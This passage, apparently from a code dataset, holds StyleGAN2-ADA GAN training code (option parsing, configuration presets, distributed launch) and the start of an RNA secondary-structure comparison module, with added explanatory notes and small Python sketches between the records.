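Note on the jumper record above: Game.play_round nests its win loop inside the wrong-guess loop and never sets self.winner to True, so a finished game cannot fall out of the outer loop, and puzzle_array.index(i) reveals only the first occurrence of a repeated letter. A minimal sketch of the round loop it appears to be aiming for; the function and variable names here are hypothetical, only the word list and the 5-guess limit come from the record:

    # Simplified stand-in for Game.play_round above: one guess loop with
    # explicit win/lose exits and all occurrences of a letter revealed.
    import random

    def play_round(word: str, max_wrong: int = 5) -> bool:
        answer = ["_"] * len(word)
        wrong = 0
        guessed = set()
        while wrong < max_wrong and "_" in answer:
            letter = input("Choose a letter: ").strip().lower()
            if letter in guessed:
                print("You already guessed this. Try again.")
                continue
            guessed.add(letter)
            if letter in word:
                for i, ch in enumerate(word):
                    if ch == letter:
                        answer[i] = letter   # reveal every occurrence, not just the first
            else:
                wrong += 1
            print(" ".join(answer), f"(wrong: {wrong}/{max_wrong})")
        return "_" not in answer

    if play_round(random.choice(["boots", "clats", "gamet", "plant", "water"])):
        print("Super Duper!")
    else:
        print("That's too many wrong.")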
'auto' (default), 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar'\n lrate=None, # Override learning rate: \n gamma=None, # Override R1 gamma: \n kimg=None, # Override training duration: \n batch=None, # Override batch size: \n num_channel_g=None, # Override width of generator network: \n num_channel_d=None, # Override width of discriminator network: \n channel_max_g=None, # Override max width of generator network: \n channel_max_d=None, # Override max width of discriminator network: \n hidden_dim_c=None, # Override embedding dimensionality for class conditioning inside mapping network\n hidden_dim_h=None, # Override embedding dimensionality for instance conditioning inside mapping network\n es_patience=None, # Early stopping patience in number of seen images: \n # Discriminator augmentation.\n aug=None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed'\n p=None, # Specify p for 'fixed' (required): \n target=None, # Override ADA target for 'ada': , default = depends on aug\n augpipe=None, # Augmentation pipeline: 'blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc' (default), ..., 'bgcfnc'\n # Transfer learning.\n resume=None, # Load previous network: 'noresume' (default), 'ffhq256', 'ffhq512', 'ffhq1024', 'celebahq256', 'lsundog256', , \n freezed=None, # Freeze-D: , default = 0 discriminator layers\n # Performance options (not included in desc).\n fp32=None, # Disable mixed-precision training: , default = False\n nhwc=None, # Use NHWC memory format with FP16: , default = False\n allow_tf32=None, # Allow PyTorch to use TF32 for matmul and convolutions: , default = False\n nobench=None, # Disable cuDNN benchmarking: , default = False\n workers=None, # Override number of DataLoader workers: , default = 3\n **kwargs,\n):\n args = dnnlib.EasyDict()\n\n # ------------------------------------------\n # General options: gpus, snap, metrics, seed\n # ------------------------------------------\n\n if gpus is None:\n gpus = 1\n assert isinstance(gpus, int)\n if not (gpus >= 1 and gpus & (gpus - 1) == 0):\n raise UserError(\"--gpus must be a power of two\")\n args.num_gpus = gpus * nodes\n\n if snap is None:\n snap = 50\n assert isinstance(snap, int)\n if snap < 1:\n raise UserError(\"--snap must be at least 1\")\n args.image_snapshot_ticks = snap\n args.network_snapshot_ticks = snap\n args.es_patience = es_patience\n\n if metrics is None:\n metrics = [\"fid50k_full\"]\n assert isinstance(metrics, list)\n if not all(metric_main.is_valid_metric(metric) for metric in metrics):\n raise UserError(\n \"\\n\".join(\n [\"--metrics can only contain the following values:\"]\n + metric_main.list_valid_metrics()\n )\n )\n args.metrics = metrics\n\n if seed is None:\n seed = 0\n assert isinstance(seed, int)\n args.random_seed = seed\n\n # -----------------------------------\n # Dataset: data, cond, subset, mirror\n # -----------------------------------\n\n assert data is not None\n assert isinstance(data, str)\n\n class_name = \"data_utils.datasets_common.ILSVRC_HDF5_feats\"\n args.class_cond = class_cond\n args.instance_cond = instance_cond\n\n if mirror is None:\n mirror = False\n assert isinstance(mirror, bool)\n\n args.training_set_kwargs = dnnlib.EasyDict(\n class_name=class_name,\n root=data,\n max_size=None,\n xflip=False,\n load_labels=class_cond,\n load_features=instance_cond,\n root_feats=root_feats,\n root_nns=root_nns,\n transform=None,\n label_dim=label_dim,\n feature_dim=2048,\n apply_norm=False,\n label_onehot=True,\n feature_augmentation=feature_augmentation,\n )\n 
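Note: the train.py record above threads nearly every option through dnnlib.EasyDict. For readers without dnnlib on hand, a minimal stand-in with the same dict-plus-attribute-access behavior might look like the sketch below; this assumes the conventional EasyDict shape rather than quoting dnnlib's source:

    # Minimal stand-in for dnnlib.EasyDict: a dict whose items are also
    # reachable as attributes (an assumption about dnnlib, not its code).
    class EasyDict(dict):
        def __getattr__(self, name):
            try:
                return self[name]
            except KeyError as err:
                raise AttributeError(name) from err

        def __setattr__(self, name, value):
            self[name] = value

        def __delattr__(self, name):
            del self[name]

    cfg = EasyDict(lr=0.0025)
    cfg.gamma = 0.8192
    print(cfg["gamma"], cfg.lr)   # 0.8192 0.0025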
args.data_loader_kwargs = dnnlib.EasyDict(\n pin_memory=True, num_workers=3, prefetch_factor=2\n )\n try:\n training_set = dnnlib.util.construct_class_by_name(\n **args.training_set_kwargs\n ) # subclass of training.dataset.Dataset\n args.training_set_kwargs.resolution = (\n training_set.resolution\n ) # be explicit about resolution\n args.training_set_kwargs.load_labels = class_cond\n args.training_set_kwargs.max_size = len(\n training_set\n ) # be explicit about dataset size\n desc = os.path.splitext(os.path.basename(data))[0]\n del training_set # conserve memory\n except IOError as err:\n raise UserError(f\"--data: {err}\")\n\n if mirror:\n desc += \"-mirror\"\n args.training_set_kwargs.xflip = True\n\n # if load_labels:\n # if not args.training_set_kwargs.load_labels:\n # raise UserError('--cond=True requires labels specified in dataset.json')\n # desc += '-cond'\n # else:\n # args.training_set_kwargs.load_labels = False\n # if load_features and not load_labels:\n # args.training_set_kwargs.label_dim=2048\n\n if subset is not None:\n assert isinstance(subset, int)\n if not 1 <= subset <= args.training_set_kwargs.max_size:\n raise UserError(\n f\"--subset must be between 1 and {args.training_set_kwargs.max_size}\"\n )\n desc += f\"-subset{subset}\"\n if subset < args.training_set_kwargs.max_size:\n args.training_set_kwargs.max_size = subset\n args.training_set_kwargs.random_seed = args.random_seed\n\n # ------------------------------------\n # Base config: cfg, gamma, kimg, batch\n # ------------------------------------\n\n if cfg is None:\n cfg = \"auto\"\n assert isinstance(cfg, str)\n desc += f\"-{cfg}\"\n\n cfg_specs = {\n \"auto\": dict(\n ref_gpus=-1,\n kimg=25000,\n mb=-1,\n mbstd=-1,\n fmaps=-1,\n lrate=-1,\n gamma=-1,\n ema=-1,\n ramp=0.05,\n map=2,\n ), # Populated dynamically based on resolution and GPU count.\n \"stylegan2\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=32,\n mbstd=4,\n fmaps=1,\n lrate=0.002,\n gamma=10,\n ema=10,\n ramp=None,\n map=8,\n ), # Uses mixed-precision, unlike the original StyleGAN2.\n \"paper256\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=64,\n mbstd=8,\n fmaps=0.5,\n lrate=0.0025,\n gamma=1,\n ema=20,\n ramp=None,\n map=8,\n ),\n \"paper512\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=64,\n mbstd=8,\n fmaps=1,\n lrate=0.0025,\n gamma=0.5,\n ema=20,\n ramp=None,\n map=8,\n ),\n \"paper1024\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=32,\n mbstd=4,\n fmaps=1,\n lrate=0.002,\n gamma=2,\n ema=10,\n ramp=None,\n map=8,\n ),\n \"cifar\": dict(\n ref_gpus=2,\n kimg=100000,\n mb=64,\n mbstd=32,\n fmaps=1,\n lrate=0.0025,\n gamma=0.01,\n ema=500,\n ramp=0.05,\n map=2,\n ),\n }\n\n assert cfg in cfg_specs\n spec = dnnlib.EasyDict(cfg_specs[cfg])\n if cfg == \"auto\":\n desc += f\"{gpus:d}\"\n spec.ref_gpus = args.num_gpus\n res = args.training_set_kwargs.resolution\n spec.mb = max(\n min(args.num_gpus * min(4096 // res, 32), 64), args.num_gpus\n ) # keep gpu memory consumption at bay\n spec.mbstd = min(\n spec.mb // args.num_gpus, 4\n ) # other hyperparams behave more predictably if mbstd group size remains fixed\n spec.fmaps = 1 if res >= 512 else 0.5\n spec.lrate = 0.002 if res >= 1024 else 0.0025\n spec.gamma = 0.0002 * (res ** 2) / spec.mb # heuristic formula\n spec.ema = spec.mb * 10 / 32\n\n args.G_kwargs = dnnlib.EasyDict(\n class_name=\"training.networks.Generator\",\n z_dim=512,\n w_dim=512,\n mapping_kwargs=dnnlib.EasyDict(),\n synthesis_kwargs=dnnlib.EasyDict(),\n )\n args.D_kwargs = dnnlib.EasyDict(\n class_name=\"training.networks.Discriminator\",\n 
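Note: the 'auto' branch above derives the batch size, minibatch-std group size, feature-map multiplier, learning rate, R1 gamma and EMA half-life purely from resolution and GPU count. Evaluating those same formulas for a 256x256 run on one GPU makes the heuristic concrete:

    # Worked example of the 'auto' config heuristics from the record above,
    # for resolution 256 on a single GPU.
    num_gpus, res = 1, 256
    mb = max(min(num_gpus * min(4096 // res, 32), 64), num_gpus)  # -> 16
    mbstd = min(mb // num_gpus, 4)                                # -> 4
    fmaps = 1 if res >= 512 else 0.5                              # -> 0.5
    lrate = 0.002 if res >= 1024 else 0.0025                      # -> 0.0025
    gamma = 0.0002 * (res ** 2) / mb                              # -> 0.8192
    ema = mb * 10 / 32                                            # -> 5.0
    print(mb, mbstd, fmaps, lrate, gamma, ema)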
block_kwargs=dnnlib.EasyDict(),\n mapping_kwargs=dnnlib.EasyDict(),\n epilogue_kwargs=dnnlib.EasyDict(),\n )\n args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int(\n spec.fmaps * 32768\n )\n args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512\n args.G_kwargs.mapping_kwargs.num_layers = spec.map\n if hidden_dim_c is not None:\n args.G_kwargs.mapping_kwargs.embed_features = hidden_dim_c\n args.D_kwargs.mapping_kwargs.embed_features = hidden_dim_c\n if hidden_dim_h is not None:\n args.G_kwargs.mapping_kwargs.embed_features_feat = hidden_dim_h\n args.D_kwargs.mapping_kwargs.embed_features_feat = hidden_dim_h\n args.G_kwargs.synthesis_kwargs.num_fp16_res = (\n args.D_kwargs.num_fp16_res\n ) = 4 # enable mixed-precision training\n args.G_kwargs.synthesis_kwargs.conv_clamp = (\n args.D_kwargs.conv_clamp\n ) = 256 # clamp activations to avoid float16 overflow\n args.D_kwargs.epilogue_kwargs.mbstd_group_size = spec.mbstd\n\n args.exp_name = exp_name\n if num_channel_d is not None:\n args.D_kwargs.channel_base = num_channel_d\n if channel_max_d is not None:\n args.D_kwargs.channel_max = channel_max_d\n if num_channel_g is not None:\n args.G_kwargs.synthesis_kwargs.channel_base = num_channel_g\n if channel_max_g is not None:\n args.G_kwargs.synthesis_kwargs.channel_max = channel_max_g\n\n if lrate is not None:\n spec.lrate = lrate\n\n args.G_opt_kwargs = dnnlib.EasyDict(\n class_name=\"torch.optim.Adam\", lr=spec.lrate, betas=[0, 0.99], eps=1e-8\n )\n args.D_opt_kwargs = dnnlib.EasyDict(\n class_name=\"torch.optim.Adam\", lr=spec.lrate, betas=[0, 0.99], eps=1e-8\n )\n args.loss_kwargs = dnnlib.EasyDict(\n class_name=\"training.loss.StyleGAN2Loss\", r1_gamma=spec.gamma\n )\n\n args.total_kimg = spec.kimg\n args.batch_size = spec.mb\n args.batch_gpu = spec.mb // spec.ref_gpus\n args.ema_kimg = spec.ema\n args.ema_rampup = spec.ramp\n\n if cfg == \"cifar\":\n args.loss_kwargs.pl_weight = 0 # disable path length regularization\n args.loss_kwargs.style_mixing_prob = 0 # disable style mixing\n args.D_kwargs.architecture = \"orig\" # disable residual skip connections\n\n if gamma is not None:\n assert isinstance(gamma, float)\n if not gamma >= 0:\n raise UserError(\"--gamma must be non-negative\")\n desc += f\"-gamma{gamma:g}\"\n args.loss_kwargs.r1_gamma = gamma\n\n if kimg is not None:\n assert isinstance(kimg, int)\n if not kimg >= 1:\n raise UserError(\"--kimg must be at least 1\")\n desc += f\"-kimg{kimg:d}\"\n args.total_kimg = kimg\n\n if batch is not None:\n assert isinstance(batch, int)\n if not (batch >= 1 and batch % args.num_gpus == 0):\n raise UserError(\n \"--batch must be at least 1 and divisible by --gpus and --nodes\"\n )\n desc += f\"-batch{batch}\"\n args.batch_size = batch\n args.batch_gpu = batch // (args.num_gpus)\n args.slurm = slurm\n\n # ---------------------------------------------------\n # Discriminator augmentation: aug, p, target, augpipe\n # ---------------------------------------------------\n\n if aug is None:\n aug = \"ada\"\n else:\n assert isinstance(aug, str)\n desc += f\"-{aug}\"\n\n if aug == \"ada\":\n args.ada_target = 0.6\n\n elif aug == \"noaug\":\n pass\n\n elif aug == \"fixed\":\n if p is None:\n raise UserError(f\"--aug={aug} requires specifying --p\")\n\n else:\n raise UserError(f\"--aug={aug} not supported\")\n\n if p is not None:\n assert isinstance(p, float)\n if aug != \"fixed\":\n raise UserError(\"--p can only be specified with --aug=fixed\")\n if not 0 <= p <= 1:\n raise UserError(\"--p must be between 
0 and 1\")\n desc += f\"-p{p:g}\"\n args.augment_p = p\n\n if target is not None:\n assert isinstance(target, float)\n if aug != \"ada\":\n raise UserError(\"--target can only be specified with --aug=ada\")\n if not 0 <= target <= 1:\n raise UserError(\"--target must be between 0 and 1\")\n desc += f\"-target{target:g}\"\n args.ada_target = target\n\n assert augpipe is None or isinstance(augpipe, str)\n if augpipe is None:\n augpipe = \"bgc\"\n else:\n if aug == \"noaug\":\n raise UserError(\"--augpipe cannot be specified with --aug=noaug\")\n desc += f\"-{augpipe}\"\n\n augpipe_specs = {\n \"blit\": dict(xflip=1, rotate90=1, xint=1),\n \"geom\": dict(scale=1, rotate=1, aniso=1, xfrac=1),\n \"color\": dict(brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1),\n \"filter\": dict(imgfilter=1),\n \"noise\": dict(noise=1),\n \"cutout\": dict(cutout=1),\n \"bg\": dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1),\n \"bgc\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n ),\n \"bgcf\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n ),\n \"bgcfn\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n noise=1,\n ),\n \"bgcfnc\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n noise=1,\n cutout=1,\n ),\n }\n\n assert augpipe in augpipe_specs\n if aug != \"noaug\":\n args.augment_kwargs = dnnlib.EasyDict(\n class_name=\"training.augment.AugmentPipe\", **augpipe_specs[augpipe]\n )\n\n # ----------------------------------\n # Transfer learning: resume, freezed\n # ----------------------------------\n\n resume_specs = {\n \"ffhq256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res256-mirror-paper256-noaug.pkl\",\n \"ffhq512\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res512-mirror-stylegan2-noaug.pkl\",\n \"ffhq1024\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res1024-mirror-stylegan2-noaug.pkl\",\n \"celebahq256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/celebahq-res256-mirror-paper256-kimg100000-ada-target0.5.pkl\",\n \"lsundog256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/lsundog-res256-paper256-kimg100000-noaug.pkl\",\n }\n\n assert resume is None or isinstance(resume, str)\n if resume is None:\n resume = \"noresume\"\n elif resume == \"noresume\":\n desc += \"-noresume\"\n elif resume in resume_specs:\n desc += f\"-resume{resume}\"\n args.resume_pkl = resume_specs[resume] # predefined url\n else:\n desc += \"-resumecustom\"\n args.resume_pkl = resume # custom path or url\n\n if resume != \"noresume\":\n args.ada_kimg = 100 # make ADA react faster at the beginning\n args.ema_rampup = None # disable EMA rampup\n\n if freezed is not None:\n assert isinstance(freezed, int)\n if not freezed >= 0:\n raise UserError(\"--freezed must be non-negative\")\n desc += f\"-freezed{freezed:d}\"\n 
args.D_kwargs.block_kwargs.freeze_layers = freezed\n\n # -------------------------------------------------\n # Performance options: fp32, nhwc, nobench, workers\n # -------------------------------------------------\n\n if fp32 is None:\n fp32 = False\n assert isinstance(fp32, bool)\n if fp32:\n args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 0\n args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = None\n\n if nhwc is None:\n nhwc = False\n assert isinstance(nhwc, bool)\n if nhwc:\n args.G_kwargs.synthesis_kwargs.fp16_channels_last = (\n args.D_kwargs.block_kwargs.fp16_channels_last\n ) = True\n\n if nobench is None:\n nobench = False\n assert isinstance(nobench, bool)\n if nobench:\n args.cudnn_benchmark = False\n\n if allow_tf32 is None:\n allow_tf32 = False\n assert isinstance(allow_tf32, bool)\n if allow_tf32:\n args.allow_tf32 = True\n\n if workers is not None:\n assert isinstance(workers, int)\n if not workers >= 1:\n raise UserError(\"--workers must be at least 1\")\n args.data_loader_kwargs.num_workers = workers\n\n return desc, args\n\n\n# ----------------------------------------------------------------------------\n\n\ndef subprocess_fn(rank, args, world_size=1, dist_url=\"\", temp_dir=\"\", slurm=False):\n dnnlib.util.Logger(\n file_name=os.path.join(args.run_dir, \"log.txt\"),\n file_mode=\"a\",\n should_flush=True,\n )\n\n # Init torch.distributed.\n if not slurm and args.num_gpus > 1:\n init_file = os.path.abspath(os.path.join(temp_dir, \".torch_distributed_init\"))\n if os.name == \"nt\":\n init_method = \"file:///\" + init_file.replace(\"\\\\\", \"/\")\n torch.distributed.init_process_group(\n backend=\"gloo\",\n init_method=init_method,\n rank=rank,\n world_size=args.num_gpus,\n )\n else:\n init_method = f\"file://{init_file}\"\n torch.distributed.init_process_group(\n backend=\"nccl\",\n init_method=init_method,\n rank=rank,\n world_size=args.num_gpus,\n )\n # Init torch_utils.\n sync_device = torch.device(\"cuda\", rank) if args.num_gpus > 1 else None\n training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)\n local_rank = rank\n\n elif slurm:\n rank = int(os.environ.get(\"SLURM_PROCID\"))\n local_rank = int(os.environ.get(\"SLURM_LOCALID\"))\n torch.distributed.init_process_group(\n backend=\"nccl\", init_method=dist_url, rank=rank, world_size=world_size\n )\n else:\n rank = local_rank = 0\n\n if rank != 0:\n custom_ops.verbosity = \"none\"\n\n # Execute training loop.\n training_loop.training_loop(\n rank=rank, local_rank=local_rank, temp_dir=temp_dir, **args\n )\n\n\n# ----------------------------------------------------------------------------\n\n\nclass CommaSeparatedList(click.ParamType):\n name = \"list\"\n\n def convert(self, value, param, ctx):\n _ = param, ctx\n if value is None or value.lower() == \"none\" or value == \"\":\n return []\n return value.split(\",\")\n\n\n# ----------------------------------------------------------------------------\n\n\ndef main(args, outdir, master_node=\"\", port=40000, dry_run=False, **config_kwargs):\n \"\"\"Train a GAN using the techniques described in the paper\n \"Training Generative Adversarial Networks with Limited Data\".\n\n Examples:\n\n \\b\n # Train with custom dataset using 1 GPU.\n python train.py --outdir=~/training-runs --data=~/mydataset.zip --gpus=1\n\n \\b\n # Train class-conditional CIFAR-10 using 2 GPUs.\n python train.py --outdir=~/training-runs --data=~/datasets/cifar10.zip \\\\\n --gpus=2 --cfg=cifar --cond=1\n\n \\b\n # Transfer learn MetFaces 
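Note: subprocess_fn above rendezvouses the ranks through a file:// init_method when not running under SLURM (gloo on Windows, NCCL elsewhere). A minimal sketch of that handshake, assuming Linux with NCCL and one GPU per rank:

    # Sketch of the file-based torch.distributed rendezvous used in
    # subprocess_fn above; run once per rank with a shared temp_dir.
    import os
    import torch

    def init_dist(rank: int, world_size: int, temp_dir: str) -> None:
        init_file = os.path.abspath(os.path.join(temp_dir, ".torch_distributed_init"))
        torch.distributed.init_process_group(
            backend="nccl",
            init_method=f"file://{init_file}",
            rank=rank,
            world_size=world_size,
        )
        torch.cuda.set_device(rank)  # pin each rank to its own GPU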
from FFHQ using 4 GPUs.\n python train.py --outdir=~/training-runs --data=~/datasets/metfaces.zip \\\\\n --gpus=4 --cfg=paper1024 --mirror=1 --resume=ffhq1024 --snap=10\n\n \\b\n # Reproduce original StyleGAN2 config F.\n python train.py --outdir=~/training-runs --data=~/datasets/ffhq.zip \\\\\n --gpus=8 --cfg=stylegan2 --mirror=1 --aug=noaug\n\n \\b\n Base configs (--cfg):\n auto Automatically select reasonable defaults based on resolution\n and GPU count. Good starting point for new datasets.\n stylegan2 Reproduce results for StyleGAN2 config F at 1024x1024.\n paper256 Reproduce results for FFHQ and LSUN Cat at 256x256.\n paper512 Reproduce results for BreCaHAD and AFHQ at 512x512.\n paper1024 Reproduce results for MetFaces at 1024x1024.\n cifar Reproduce results for CIFAR-10 at 32x32.\n\n \\b\n Transfer learning source networks (--resume):\n ffhq256 FFHQ trained at 256x256 resolution.\n ffhq512 FFHQ trained at 512x512 resolution.\n ffhq1024 FFHQ trained at 1024x1024 resolution.\n celebahq256 CelebA-HQ trained at 256x256 resolution.\n lsundog256 LSUN Dog trained at 256x256 resolution.\n Custom network pickle.\n \"\"\"\n dnnlib.util.Logger(should_flush=True)\n\n # Setup training options.\n config_kwargs = vars(args)\n run_desc, args = setup_training_loop_kwargs(**config_kwargs)\n args.metrics = [\"fid50k_full\"]\n\n if args.exp_name is None:\n # Pick output directory.\n prev_run_dirs = []\n if os.path.isdir(outdir):\n prev_run_dirs = [\n x for x in os.listdir(outdir) if os.path.isdir(os.path.join(outdir, x))\n ]\n prev_run_ids = [re.match(r\"^\\d+\", x) for x in prev_run_dirs]\n prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None]\n cur_run_id = max(prev_run_ids, default=-1) + 1\n args.run_dir = os.path.join(outdir, f\"{cur_run_id:05d}-{run_desc}\")\n assert not os.path.exists(args.run_dir)\n else:\n args.run_dir = os.path.join(outdir, args.exp_name)\n\n # Print options.\n print()\n print(\"Training options:\")\n # print(json.dumps(args, indent=2))\n print()\n print(f\"Output directory: {args.run_dir}\")\n print(f\"Training data: {args.training_set_kwargs.root}\")\n print(f\"Training duration: {args.total_kimg} kimg\")\n print(f\"Number of GPUs: {args.num_gpus}\")\n print(f\"Number of images: {args.training_set_kwargs.max_size}\")\n print(f\"Image resolution: {args.training_set_kwargs.resolution}\")\n print(f\"Conditional model: {args.training_set_kwargs.load_labels}\")\n print(f\"Dataset x-flips: {args.training_set_kwargs.xflip}\")\n print()\n\n # Dry run?\n if dry_run:\n print(\"Dry run; exiting.\")\n return\n\n # Create output directory.\n print(\"Creating output directory...\")\n if not os.path.exists(args.run_dir):\n os.makedirs(args.run_dir, exist_ok=True)\n with open(os.path.join(args.run_dir, \"training_options.json\"), \"wt\") as f:\n json.dump(args, f, indent=2)\n\n ## Multi-gpu or multi-node training ##\n if args.slurm:\n n_nodes = int(os.environ.get(\"SLURM_JOB_NUM_NODES\"))\n n_gpus_per_node = int(os.environ.get(\"SLURM_TASKS_PER_NODE\").split(\"(\")[0])\n world_size = n_gpus_per_node * n_nodes\n dist_url = \"tcp://\"\n dist_url += master_node\n dist_url += \":\" + str(port)\n print(\"Dist url \", dist_url)\n temp_dir = \"/scratch/slurm_tmpdir/\" + str(os.environ.get(\"SLURM_JOB_ID\"))\n subprocess_fn(\n rank=-1,\n args=args,\n world_size=world_size,\n dist_url=dist_url,\n temp_dir=temp_dir,\n slurm=args.slurm,\n )\n else:\n # Launch processes.\n print(\"Launching processes...\")\n torch.multiprocessing.set_start_method(\"spawn\")\n with 
tempfile.TemporaryDirectory() as temp_dir:\n if args.num_gpus == 1:\n subprocess_fn(rank=0, args=args, temp_dir=temp_dir)\n else:\n torch.multiprocessing.spawn(\n fn=subprocess_fn,\n args=(args, args.num_gpus, \"\", temp_dir),\n nprocs=args.num_gpus,\n )\n\n\n# ----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n parser_ = parser.get_parser()\n args = parser_.parse_args()\n main(args) # pylint: disable=no-value-for-parameter\n\n# ----------------------------------------------------------------------------\n","repo_name":"facebookresearch/ic_gan","sub_path":"stylegan2_ada_pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":27218,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"47"} +{"seq_id":"21343712006","text":"import sys\nsys.path.append('/switchfinder/')\n\n\nimport SwitchFinder.dotbracket_comparisons as dotbracket_comparisons\nimport SwitchFinder.glob_vars as glob_vars\nimport SwitchFinder.utils as utils\nimport SwitchFinder.check_base_pairing as check_base_pairing\nimport textwrap\nimport numpy as np\nimport copy\n\n\nclass fragment_collection:\n def __init__(self):\n self.body_dict = {}\n\n def identify_stretches(self,\n MAX_SPACING = 1,\n MIN_STEM_LENGHT = 3,\n MAXIMAL_OVERHANG = 2\n ):\n for i in self.body_dict:\n self.body_dict[i].identify_stretches(MAX_SPACING, MIN_STEM_LENGHT, MAXIMAL_OVERHANG)\n self.body_dict[i].convert_to_numpy()\n\n\n def remove_outer_stretches(self):\n for i in self.body_dict:\n self.body_dict[i].remove_outer_stretches()\n\n\n def print(self, num_to_print = 2, width = 91,\n show_changing_structures = True,\n show_unchanged_structures=True,\n show_inner_stems = False,\n show_outer_stems = False,\n do_return = True\n ):\n all_fragments_names = sorted(list(self.body_dict.keys()))\n strings_to_print_list = []\n strings_to_print_list.append(\"Printing %d first fragments as specified\\n\" % num_to_print)\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n for i in range(num_to_print):\n fr_string = self.body_dict[all_fragments_names[i]].print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width=width,\n do_return = do_return\n )\n strings_to_print_list.append(fr_string)\n if do_return:\n return \"\\n\".join(strings_to_print_list)\n\n\nclass fragment:\n def __init__(self):\n self.name = ''\n self.major_conf = conformation()\n self.second_conf = conformation()\n self.common_conf = conformation()\n self.sequence = ''\n self.changing_loops_mask = None\n self.A_C_mask = None\n\n def identify_stretches(self, MAX_SPACING = 1, MIN_STEM_LENGHT = 3, MAXIMAL_OVERHANG = 2):\n self.major_conf.get_all_basepair_stretches()\n self.second_conf.get_all_basepair_stretches()\n\n self.major_conf.combine_parts_of_the_same_stretch_together(MAX_SPACING)\n self.second_conf.combine_parts_of_the_same_stretch_together(MAX_SPACING)\n\n unchanged_stretches_major, \\\n changed_stretches_major, \\\n unchanged_stretches_second, \\\n changed_stretches_second = dotbracket_comparisons.remove_changing_parts_both_conformations(\n self.major_conf.stretches_with_spaces, self.second_conf.stretches_with_spaces,\n self.major_conf.string, self.second_conf.string,\n MAXIMAL_OVERHANG = MAXIMAL_OVERHANG\n )\n self.major_conf.changed_stretches = changed_stretches_major\n self.major_conf.unchanged_stretches = unchanged_stretches_major\n self.second_conf.changed_stretches = 
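Note: the launcher at the end of the train.py record pairs torch.multiprocessing.spawn with a TemporaryDirectory that hosts the rendezvous file. A condensed sketch of that pattern, with train_fn as a hypothetical stand-in for subprocess_fn:

    # Condensed sketch of the spawn-based launch in main() above.
    import tempfile
    import torch

    def train_fn(rank: int, num_gpus: int, temp_dir: str) -> None:
        ...  # per-rank setup and training loop

    def launch(num_gpus: int) -> None:
        # force=True keeps the sketch re-runnable; the record calls it bare.
        torch.multiprocessing.set_start_method("spawn", force=True)
        with tempfile.TemporaryDirectory() as temp_dir:
            if num_gpus == 1:
                train_fn(0, num_gpus, temp_dir)
            else:
                # spawn calls train_fn(rank, *args) for rank in range(nprocs)
                torch.multiprocessing.spawn(fn=train_fn, args=(num_gpus, temp_dir), nprocs=num_gpus)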
changed_stretches_second\n self.second_conf.unchanged_stretches = unchanged_stretches_second\n\n self.major_conf.changed_stretches_no_short = dotbracket_comparisons.remove_short_changing_stems(\n self.major_conf.changed_stretches, MIN_STEM_LENGHT = MIN_STEM_LENGHT\n )\n self.second_conf.changed_stretches_no_short = dotbracket_comparisons.remove_short_changing_stems(\n self.second_conf.changed_stretches, MIN_STEM_LENGHT = MIN_STEM_LENGHT\n )\n\n def remove_outer_stretches(self):\n no_outer_stretches = dotbracket_comparisons.remove_all_outer_stems(self.major_conf.unchanged_stretches,\n self.major_conf.changed_stretches,\n self.second_conf.changed_stretches)\n self.major_conf.no_outer_stretches = no_outer_stretches\n self.second_conf.no_outer_stretches = no_outer_stretches\n\n outer_stretches_only = dotbracket_comparisons.two_stretches_difference(self.major_conf.unchanged_stretches,\n self.major_conf.no_outer_stretches)\n\n self.major_conf.outer_stretches = outer_stretches_only\n self.second_conf.outer_stretches = outer_stretches_only\n\n inner_stretches_unchanged = dotbracket_comparisons.two_stretches_difference(self.major_conf.unchanged_stretches,\n self.major_conf.outer_stretches)\n\n self.major_conf.unchanged_inner_stretches = inner_stretches_unchanged\n self.second_conf.unchanged_inner_stretches = inner_stretches_unchanged\n\n def initialize_pairing_states(self):\n self.major_conf.get_pairing_states()\n self.second_conf.get_pairing_states()\n\n\n def get_differential_pairing_states(self):\n if self.major_conf.pairing_states is None or \\\n self.second_conf.pairing_states is None:\n self.initialize_pairing_states()\n\n 